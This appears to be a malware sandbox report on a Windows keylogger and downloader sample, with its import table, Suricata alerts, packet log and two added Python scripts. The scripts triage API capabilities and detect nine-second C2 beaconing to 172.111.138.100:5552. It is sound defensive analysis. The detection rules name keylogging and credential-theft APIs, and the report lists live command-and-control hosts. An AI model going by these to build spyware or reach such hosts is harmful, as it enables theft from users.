GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, 
EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                              ole32.dllCLSIDFromString
                                                                                                              kernel32.dllSleep
                                                                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                              ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                              oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                              comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                              shell32.dllShellExecuteExA, ExtractIconExW
                                                                                                              wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                                              shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                                              advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                                              wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                                              netapi32.dllNetbios
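An import table like the one above is the quickest static triage signal a sample gives away: the keyboard-hook, clipboard, WinINet download, resource-rewriting and token-privilege APIs together are what the report's "keylogger", "dropper" and "downloader" behaviours rest on. The script below is an added example, not Joe Sandbox code: it parses a subset of the table above (embedded as constructed text in the same "dll: functions" layout, so several entries are left out), merges DLLs that appear more than once, and maps the API names to capabilities using rules that require a combination of imports rather than a single name. The rule set and capability labels are this example's own assumptions.

```python
from collections import defaultdict

# Constructed input: a subset of the import table above, in "dll: funcs" form.
# Deliberately includes advapi32.dll twice, as the report lists it twice.
IMPORTS_TEXT = """\
advapi32.dll: RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll: WritePrivateProfileStringA, WriteFile, UpdateResourceA, TerminateProcess, OpenProcess, OpenMutexA, LoadLibraryA, GetProcAddress, GetComputerNameA, GetVersionExA, GetTempPathA, FindResourceA, EndUpdateResourceA, CreateProcessA, CreatePipe, CreateMutexA, CreateFileA, CopyFileA, BeginUpdateResourceA
user32.dll: SetWindowsHookExA, UnhookWindowsHookEx, CallNextHookEx, ToAsciiEx, MapVirtualKeyA, GetKeyboardState, GetKeyState, GetKeyNameTextA, GetForegroundWindow, GetClipboardData, FindWindowA
shell32.dll: ShellExecuteExA, ExtractIconExW
wininet.dll: InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
advapi32.dll: OpenSCManagerA, CloseServiceHandle
wsock32.dll: WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
netapi32.dll: Netbios
"""

# Assumed capability rules (this example's own, not a published taxonomy).
# all_of: every name must be imported; any_of: at least one must be (if non-empty).
CAPABILITY_RULES = {
    "keyboard hook (keylogging)": {
        "all_of": {"SetWindowsHookExA"},
        "any_of": {"GetKeyState", "GetKeyboardState", "ToAsciiEx", "MapVirtualKeyA", "GetKeyNameTextA"},
    },
    "clipboard read": {"all_of": {"GetClipboardData"}, "any_of": set()},
    "HTTP download (WinINet)": {
        "all_of": {"InternetOpenA", "InternetOpenUrlA", "InternetReadFile"},
        "any_of": set(),
    },
    "registry persistence": {
        "all_of": {"RegSetValueExA"},
        "any_of": {"RegCreateKeyExA", "RegOpenKeyExA"},
    },
    "PE resource rewriting (self-update / dropper)": {
        "all_of": {"BeginUpdateResourceA", "UpdateResourceA", "EndUpdateResourceA"},
        "any_of": set(),
    },
    "process launch": {"all_of": set(), "any_of": {"CreateProcessA", "ShellExecuteExA", "WinExec"}},
    "token privilege adjustment": {
        "all_of": {"OpenProcessToken", "AdjustTokenPrivileges"},
        "any_of": {"LookupPrivilegeValueA"},
    },
    "host fingerprinting": {
        "all_of": set(),
        "any_of": {"GetComputerNameA", "GetUserNameA", "gethostname", "Netbios", "GetVersionExA"},
    },
    # Present in the rule set but absent from the static imports above: the report's
    # "block mouse and keyboard input" finding must come from elsewhere (see below).
    "input blocking / anti-debug": {"all_of": set(), "any_of": {"BlockInput", "IsDebuggerPresent"}},
}


def parse_import_table(text):
    """Parse 'dll: f1, f2, ...' lines; repeated DLL entries are merged."""
    imports = defaultdict(set)
    for line in text.splitlines():
        dll, sep, funcs = line.partition(":")
        if not sep:
            continue
        imports[dll.strip().lower()].update(f.strip() for f in funcs.split(",") if f.strip())
    return dict(imports)


def assess(imports):
    """Return {capability: sorted matching API names} for every rule that fires."""
    present = {f for funcs in imports.values() for f in funcs}
    findings = {}
    for cap, rule in CAPABILITY_RULES.items():
        if not rule["all_of"] <= present:
            continue
        any_hit = present & rule["any_of"]
        if rule["any_of"] and not any_hit:
            continue
        findings[cap] = sorted(rule["all_of"] | any_hit)
    return findings


def uses_dynamic_resolution(imports):
    """LoadLibraryA + GetProcAddress means the static table is a lower bound:
    APIs such as BlockInput can be resolved at run time and never appear here."""
    present = {f for funcs in imports.values() for f in funcs}
    return {"LoadLibraryA", "GetProcAddress"} <= present


if __name__ == "__main__":
    table = parse_import_table(IMPORTS_TEXT)
    for cap, apis in assess(table).items():
        print(f"{cap}: {', '.join(apis)}")
    print("dynamic API resolution possible:", uses_dynamic_resolution(table))
```

The last function is the caveat that matters in practice: because the sample imports LoadLibraryA and GetProcAddress, anything absent from the static table (the input-blocking call the report flags, for instance) may simply be resolved at run time, so an import-only verdict should be read as "at least these capabilities", never as "only these".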
Language of compilation system | Country where language is spoken
Turkish | Turkey
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-30T11:25:08.484589+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49808 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49962 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49729 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49802 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49805 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 50055 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49806 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49786 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 50084 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49809 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49903 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:08.484589+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49838 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:21.973413+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49709 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:21.983606+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49710 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:22.585705+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.8 | 49714 | 69.42.215.252 | 80 | TCP
2024-12-30T11:25:22.983824+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49715 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:22.985548+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49713 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:23.999293+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49720 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:24.000765+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49719 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:24.118958+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.8 | 49729 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:24.118958+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49729 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:24.986489+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49726 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:25.013805+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49727 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:26.525947+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49739 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:26.528668+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49740 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:27.504824+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49747 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:27.506655+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49745 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:28.527130+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49751 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:28.554577+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49750 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:29.499616+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49754 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:29.610977+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49756 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:30.172789+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49762 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:31.148666+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49768 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:31.167329+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49769 | 216.58.206.46 | 443 | TCP
2024-12-30T11:25:33.601726+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49786 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:42.653846+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49802 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:51.662498+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49805 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:00.695939+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49806 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:09.772081+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.8 | 49808 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:09.772081+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49808 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:18.834904+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49809 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:27.913134+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49838 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:36.944363+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49903 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:46.015797+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.8 | 49962 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:46.015797+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49962 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:59.990974+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 50055 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:27:09.023215+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 50084 | 172.111.138.100 | 5552 | TCP
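Read as a time series rather than as individual hits, the alerts above show the sample checking in to 172.111.138.100:5552 on a new source port roughly every nine seconds, with the Loda Logger beacon rule and the Agent.rz check-in rule firing on the same flows; the Snake Keylogger hits toward 216.58.206.46:443 arrive in near-simultaneous pairs instead. The script below is an added example, not Joe Sandbox code, showing how a SOC would pull that out of raw Suricata output: it parses alerts in fast.log form, de-duplicates rules that fire on the same flow at the same instant, groups by destination endpoint and scores how regular the inter-hit intervals are. The log lines are constructed from the table above (timestamps, SIDs, messages, IPs and ports are the report's; the fast.log layout, the Classification text and the rule revision ":1" are assumptions), and the regularity threshold is this example's own choice.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample: alerts from the table above, re-typed in Suricata fast.log form.
# Classification text and rule revision are assumed; everything else is from the report.
FAST_LOG = """\
12/30/2024-11:25:21.973413  [**] [1:2044887:1] ET MALWARE Snake Keylogger Payload Request (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49709 -> 216.58.206.46:443
12/30/2024-11:25:21.983606  [**] [1:2044887:1] ET MALWARE Snake Keylogger Payload Request (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49710 -> 216.58.206.46:443
12/30/2024-11:25:22.585705  [**] [1:2832617:1] ETPRO MALWARE W32.Bloat-A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49714 -> 69.42.215.252:80
12/30/2024-11:25:22.983824  [**] [1:2044887:1] ET MALWARE Snake Keylogger Payload Request (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49715 -> 216.58.206.46:443
12/30/2024-11:25:22.985548  [**] [1:2044887:1] ET MALWARE Snake Keylogger Payload Request (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49713 -> 216.58.206.46:443
12/30/2024-11:25:24.118958  [**] [1:2822116:1] ETPRO MALWARE Loda Logger CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49729 -> 172.111.138.100:5552
12/30/2024-11:25:24.118958  [**] [1:2849885:1] ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49729 -> 172.111.138.100:5552
12/30/2024-11:25:33.601726  [**] [1:2849885:1] ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49786 -> 172.111.138.100:5552
12/30/2024-11:25:42.653846  [**] [1:2849885:1] ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49802 -> 172.111.138.100:5552
12/30/2024-11:25:51.662498  [**] [1:2849885:1] ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49805 -> 172.111.138.100:5552
12/30/2024-11:26:00.695939  [**] [1:2849885:1] ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49806 -> 172.111.138.100:5552
12/30/2024-11:26:09.772081  [**] [1:2822116:1] ETPRO MALWARE Loda Logger CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49808 -> 172.111.138.100:5552
12/30/2024-11:26:09.772081  [**] [1:2849885:1] ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49808 -> 172.111.138.100:5552
12/30/2024-11:26:18.834904  [**] [1:2849885:1] ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49809 -> 172.111.138.100:5552
12/30/2024-11:26:27.913134  [**] [1:2849885:1] ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49838 -> 172.111.138.100:5552
12/30/2024-11:26:36.944363  [**] [1:2849885:1] ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49903 -> 172.111.138.100:5552
12/30/2024-11:26:46.015797  [**] [1:2822116:1] ETPRO MALWARE Loda Logger CnC Beacon [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49962 -> 172.111.138.100:5552
12/30/2024-11:26:46.015797  [**] [1:2849885:1] ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:49962 -> 172.111.138.100:5552
12/30/2024-11:26:59.990974  [**] [1:2849885:1] ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:50055 -> 172.111.138.100:5552
12/30/2024-11:27:09.023215  [**] [1:2849885:1] ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.8:50084 -> 172.111.138.100:5552
"""

FAST_LOG_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{4}-\d{2}:\d{2}:\d{2}\.\d{6})\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]"
    r".*?\[Priority:\s*(?P<prio>\d+)\]\s+\{(?P<proto>[A-Z]+)\}\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s*$"
)


def parse_fast_log(text):
    """Parse fast.log lines into dicts; lines that do not match the layout are skipped."""
    alerts = []
    for line in text.splitlines():
        m = FAST_LOG_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%m/%d/%Y-%H:%M:%S.%f")
        for key in ("sid", "prio", "sport", "dport"):
            d[key] = int(d[key])
        alerts.append(d)
    return alerts


def find_beacons(alerts, min_hits=4, tolerance=0.2):
    """Group alerts by destination endpoint and score the regularity of the hits.

    Two rules firing on the same flow at the same instant (Loda + Agent.rz above) are
    one hit, so timestamps are de-duplicated per endpoint. Regularity is the share of
    consecutive intervals lying within +/- tolerance of the median interval, which a
    periodic check-in pushes close to 1.0 even when one gap is longer than the rest.
    """
    by_dst = defaultdict(lambda: {"hits": set(), "sids": set()})
    for a in alerts:
        key = (a["dst"], a["dport"], a["proto"])
        by_dst[key]["hits"].add(a["ts"])
        by_dst[key]["sids"].add(a["sid"])
    results = []
    for (dst, dport, proto), info in by_dst.items():
        times = sorted(info["hits"])
        if len(times) < min_hits:
            continue
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        med = median(gaps)
        regular = sum(1 for g in gaps if abs(g - med) <= tolerance * med) / len(gaps)
        results.append({
            "endpoint": f"{dst}:{dport}/{proto}",
            "hits": len(times),
            "median_interval_s": round(med, 3),
            "regularity": round(regular, 2),
            "sids": sorted(info["sids"]),
            "beaconing": regular >= 0.8,  # threshold is an assumption for this example
        })
    return sorted(results, key=lambda r: r["regularity"], reverse=True)


if __name__ == "__main__":
    for r in find_beacons(parse_fast_log(FAST_LOG)):
        print(r)
```

Endpoints with fewer than four hits (the single Bloat-A check-in here) are dropped before scoring because a median over one or two gaps says nothing; raise min_hits on a busy sensor. Keying on the destination rather than the flow is what makes the nine-second cadence visible at all, since every check-in comes from a fresh source port.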
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 11:25:20.721272945 CET | 49709 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:20.721321106 CET | 443 | 49709 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:20.721457005 CET | 49709 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:20.736131907 CET | 49709 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:20.736156940 CET | 443 | 49709 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:20.752142906 CET | 49710 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:20.752176046 CET | 443 | 49710 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:20.752265930 CET | 49710 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:20.753304958 CET | 49710 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:20.753317118 CET | 443 | 49710 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.357553005 CET | 443 | 49710 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.357625961 CET | 49710 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.358283043 CET | 443 | 49709 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.358328104 CET | 443 | 49710 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.358355999 CET | 49709 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.358386040 CET | 49710 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.359122992 CET | 443 | 49709 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.359211922 CET | 49709 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.544214964 CET | 49709 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.544258118 CET | 443 | 49709 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.544631004 CET | 443 | 49709 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.544692039 CET | 49709 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.545433044 CET | 49710 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.545454979 CET | 443 | 49710 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.545818090 CET | 443 | 49710 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.545871973 CET | 49710 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.548494101 CET | 49710 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.555160999 CET | 49709 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.595328093 CET | 443 | 49710 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.599344969 CET | 443 | 49709 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.973408937 CET | 443 | 49709 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.973506927 CET | 49709 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.973541021 CET | 443 | 49709 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.973593950 CET | 49709 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.973864079 CET | 443 | 49709 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.973908901 CET | 49709 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.973918915 CET | 443 | 49709 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.974200964 CET | 49709 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.977679968 CET | 49709 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.977721930 CET | 443 | 49709 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.980978012 CET | 49713 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.981038094 CET | 443 | 49713 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.981225967 CET | 49713 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.983587980 CET | 443 | 49710 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.983669043 CET | 49710 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.983690977 CET | 443 | 49710 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.983731985 CET | 49710 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.984369040 CET | 443 | 49710 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.984432936 CET | 49710 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.984463930 CET | 443 | 49710 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.984592915 CET | 49710 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.985512018 CET | 49713 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.985547066 CET | 443 | 49713 | 216.58.206.46 | 192.168.2.8
Dec 30, 2024 11:25:21.988295078 CET | 49714 | 80 | 192.168.2.8 | 69.42.215.252
Dec 30, 2024 11:25:21.990765095 CET | 49710 | 443 | 192.168.2.8 | 216.58.206.46
Dec 30, 2024 11:25:21.990787029 CET | 443 | 49710 | 216.58.206.46 | 192.168.2.8
